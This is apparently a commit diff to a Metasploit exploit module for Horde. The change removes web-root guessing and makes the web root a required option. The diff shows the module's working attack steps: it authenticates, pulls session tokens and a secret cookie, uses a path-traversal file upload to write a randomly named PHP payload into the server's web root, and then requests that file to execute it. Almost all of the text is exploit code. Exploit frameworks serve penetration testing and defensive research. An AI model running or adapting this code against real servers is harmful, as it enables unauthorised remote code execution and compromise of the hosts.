Remove web root guessing since not reliable

modules/exploits/multi/http/horde_form_file_upload.rb

@@ -45,7 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
         OptString.new('USERNAME',   [true, 'The username to authenticate with']),
         OptString.new('PASSWORD',   [true, 'The password to authenticate with']),
-        OptString.new('WEB_ROOT',   [false, 'Path to the web root'])
+        OptString.new('WEB_ROOT',   [true, 'Path to the web root', '/var/www/html'])
+        # Appears to be '/usr/share/horde/' if installed with apt
       ])
   end
 
@@ -116,19 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
 
-    if not webroot
-      webroot_paths = [
-        '/var/www/html/',   # If installed with PEAR
-        '/usr/share/horde/' # If installed with apt
-      ]
-    else
-      webroot_paths = [ webroot ]
-    end
-
-    for webroot_path in webroot_paths
-
     payload_name = Rex::Text.rand_text_alpha_lower(10..12)
-      payload_path = File.join(webroot_path, "static", "#{payload_name}.php")
+    payload_path = File.join(webroot, "static", "#{payload_name}.php")
     payload_path_traversal = File.join("..", payload_path)
 
     data = Rex::MIME::Message.new
@@ -155,15 +145,9 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Executing the payload at #{payload_url}.")
     res = send_request_cgi(
         'uri'     => payload_url,
-        'method'  => 'GET'
+        'method'  => 'GET',
     )
 
-      if res and res.code == 200
     register_files_for_cleanup(payload_path)
-        break
-      else
-        vprint_bad("URL #{payload_url} hasn't been created or is not callable")
-      end
-    end
   end
 end